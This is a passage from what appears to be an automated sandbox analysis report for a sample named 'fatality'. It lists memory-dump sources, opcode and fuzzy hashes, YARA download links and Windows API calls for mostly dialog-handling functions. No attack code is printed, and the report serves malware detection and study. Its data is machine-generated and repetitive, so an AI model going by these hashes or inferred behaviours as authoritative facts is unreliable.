                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 33cc3a881d4c49c829d537218a1bbe895fe1310e69b3dd98a05b13f72e7d8cfe
                                                                    • Instruction ID: 11cd2e1f06fc35f3b606611d720f8341c862b08d1a6ac6955ebc46e89953794d
                                                                    • Opcode Fuzzy Hash: 33cc3a881d4c49c829d537218a1bbe895fe1310e69b3dd98a05b13f72e7d8cfe
                                                                    • Instruction Fuzzy Hash: 4412E4B061870A9FC718CF28C890AB9B7E1FF94304F15892EEA96C7780D374E995CB55
                                                                    Function 00DEC426 Relevance: .5, Instructions: 454COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00c0dcc9208b2d906f86d9d94c69198743e7a84fc5dd2667863a6fa7fdb56aac
                                                                    • Instruction ID: 655e507aea633073d962bdfd0a7e8609e2921f714c39e3404a187b70adc603d2
                                                                    • Opcode Fuzzy Hash: 00c0dcc9208b2d906f86d9d94c69198743e7a84fc5dd2667863a6fa7fdb56aac
                                                                    • Instruction Fuzzy Hash: 00F1AF716183818FC714EF2AC98462EBBE5EFC9314F146A2EF4C597262D630D946CF62
                                                                    Function 00DF6CDC Relevance: .3, Instructions: 343COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 511b6cba4eb2493a74034e7d7319b982f1757d5d2a7b7c5960917c35b0edb353
                                                                    • Instruction ID: 1cd6b5476ab4395e0bd6b6bd7ad581f28b68b00f19cb6814fccb0aa13816ca69
                                                                    • Opcode Fuzzy Hash: 511b6cba4eb2493a74034e7d7319b982f1757d5d2a7b7c5960917c35b0edb353
                                                                    • Instruction Fuzzy Hash: 50D1B6716083498FDB14CF28C8407ABBBE1FF85308F0A856DFA859B642D774E945CB66
                                                                    Function 00DEE9B7 Relevance: .3, Instructions: 320COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02c256798a536b04b9911625dcc95db149f3c2cc7e333ba84962b1c285b3e37f
                                                                    • Instruction ID: 90f78863e07f1b5b44ccbe247f97fc13f4d954c5a28415a8f205cbf78c3d961d
                                                                    • Opcode Fuzzy Hash: 02c256798a536b04b9911625dcc95db149f3c2cc7e333ba84962b1c285b3e37f
                                                                    • Instruction Fuzzy Hash: 23E15E755083948FC314CF5AD89086ABFF0AF9A300F45095EF9D4A7352C235E91ADFA6
                                                                    Function 00DF4088 Relevance: .3, Instructions: 270COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4284e20d82a4b4c8963c31289ec35e57d4b4c7b0c1d89691f26fd4da53ff202
                                                                    • Instruction ID: 4502d8dce26eed40a1f7ed61d2047e742d62bceb29bc9bc61850f5a3e18ced18
                                                                    • Opcode Fuzzy Hash: c4284e20d82a4b4c8963c31289ec35e57d4b4c7b0c1d89691f26fd4da53ff202
                                                                    • Instruction Fuzzy Hash: B39159B020038E9BD724EF68D890BBF77D4EB50304F15892CEB9A87281DA64A585C372
                                                                    Function 00DF43BF Relevance: .2, Instructions: 243COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                    • Instruction ID: aeb63b3dd3f6194a7dcea32235b87b9dd5564a820f9fce56a9872a030effcace
                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                    • Instruction Fuzzy Hash: CB812F7170438A5BDB24EE6CD8D1BBF37D4EB90304F05892DE7CA8B282DA64D9858771
                                                                    Function 00E051C9 Relevance: .2, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fd62dd51958edeec462a35007a909ff0686b4a8df02bb75a51c409c38096c7c
                                                                    • Instruction ID: 4567be2fbf763a3d8fd94415fe9aa6d001e289f59b5347239a57c76d3d333daa
                                                                    • Opcode Fuzzy Hash: 2fd62dd51958edeec462a35007a909ff0686b4a8df02bb75a51c409c38096c7c
                                                                    • Instruction Fuzzy Hash: 2E616873600F0966DE389A6868957FF23A4EF12348F14391AE443FF2E1D2599DC28E15
                                                                    Function 05256069 Relevance: .2, Instructions: 202COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: de20917090501bf146550b08cbabfa460931fe278b619aeb5325fc6fafbd11e0
                                                                    • Instruction ID: 1add3e50e497c1dcd0f28c0ccde3879c20220cabb01a2284c1f8b517210545db
                                                                    • Opcode Fuzzy Hash: de20917090501bf146550b08cbabfa460931fe278b619aeb5325fc6fafbd11e0
                                                                    • Instruction Fuzzy Hash: 48816C76D0122A8FCB65CF64CD48A9DB7B9BF44750F154299D80EA3254EB30AE85CF81
                                                                    Function 05256393 Relevance: .2, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5db749ab48f145b9f25fa29de45a0be3c2f89a8b2756418baa03d10edf6e5943
                                                                    • Instruction ID: 861f614393fda6ceb178b22257a288a5f391ac282d49757660ec12a5ee0927a2
                                                                    • Opcode Fuzzy Hash: 5db749ab48f145b9f25fa29de45a0be3c2f89a8b2756418baa03d10edf6e5943
                                                                    • Instruction Fuzzy Hash: B8613D75D0522A8BCF65DF28CD88699BBB9BF44740F1042E9E81EA3254EB309E85CF51
                                                                    Function 00DEEFE2 Relevance: .2, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6ae80224432dd5d7b2d8a0cdf5cc37334fb2499a6d2045810b5794446211e04
                                                                    • Instruction ID: aa2730e9e38f87dde89965e45ef6c88fbdb779571ecce30f9534fae060d9f617
                                                                    • Opcode Fuzzy Hash: f6ae80224432dd5d7b2d8a0cdf5cc37334fb2499a6d2045810b5794446211e04
                                                                    • Instruction Fuzzy Hash: 7851C3315093D58FD712DF25C5405AEBFE0AE9A314F4909AEE8D95B243C221DB4ACB72
                                                                    Function 00DFF654 Relevance: .1, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
                                                                    • Instruction ID: 788211c527ee8c282a6d3690996af8753b7b64bf503c4a029140bca5d9e7d9a6
                                                                    • Opcode Fuzzy Hash: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
                                                                    • Instruction Fuzzy Hash: A6519EB1D006098FEB25CF55E8817AABBF0FB88344F29C46AD901FB390D3749945CB60
                                                                    Function 00DF00B7 Relevance: .1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b88dc219f9430997c587fdcba6efa28bdfe8936948f3636732a6b4d3fbfc17f7
                                                                    • Instruction ID: 4ae7409887401b00f4df7ee7653049e943dfcf2c00377d7ae3777e0a2a31f897
                                                                    • Opcode Fuzzy Hash: b88dc219f9430997c587fdcba6efa28bdfe8936948f3636732a6b4d3fbfc17f7
                                                                    • Instruction Fuzzy Hash: 0A51D0B1A087159FC748CF19D48055AFBE1FF88314F058A2EE899E3341DB34E959CB96
                                                                    Function 00DF3E0B Relevance: .1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                    • Instruction ID: 3c6587b05f38946549d2b8878119e6107b08e3beeae0a58f7b50f530366ff514
                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                    • Instruction Fuzzy Hash: D43107B1A1474A8FCB18EF28C89116ABBE0FF95304F55852DE589C7341C734EA4ACBA1
                                                                    Function 00DFC220 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 286windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DFC2B1
                                                                    • EndDialog.USER32(?,00000006), ref: 00DFC2C4
                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00DFC2E0
                                                                    • SetFocus.USER32(00000000), ref: 00DFC2E7
                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00DFC321
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DFC358
                                                                    • _swprintf.LIBCMT ref: 00DFC404
                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00DFC417
                                                                    • _swprintf.LIBCMT ref: 00DFC477
                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00DFC48A
                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DFC4A7
                                                                    • _swprintf.LIBCMT ref: 00DFC535
                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00DFC548
                                                                    • _swprintf.LIBCMT ref: 00DFC59C
                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00DFC5AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow
                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                    • API String ID: 1203808948-1840816070
                                                                    • Opcode ID: 19fdf7ffe9288e50ae402cafbc747461dac17204c13e144b799a1d302534c5e4
                                                                    • Instruction ID: 4b465d68234a8ba98b34510e7c4d109d67173f84c925ae38bdc8f7657377b1c5
                                                                    • Opcode Fuzzy Hash: 19fdf7ffe9288e50ae402cafbc747461dac17204c13e144b799a1d302534c5e4
                                                                    • Instruction Fuzzy Hash: 6D91727224834CBFD2219BB1CD49FFB77ACEB8A700F058819B749E6181D675A6098772
                                                                    Function 00DEE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DEE30E
                                                                    • _strlen.LIBCMT ref: 00DEE32F
                                                                    • SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
                                                                    • GetWindowRect.USER32(?,?), ref: 00DEE3C9
                                                                    • GetClientRect.USER32(?,?), ref: 00DEE3D5
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00DEE475
                                                                    • GetWindowRect.USER32(?,?), ref: 00DEE4A2
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DEE4DB
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00DEE4E3
                                                                    • GetWindow.USER32(?,00000005), ref: 00DEE4EE
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00DEE51B
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00DEE58D
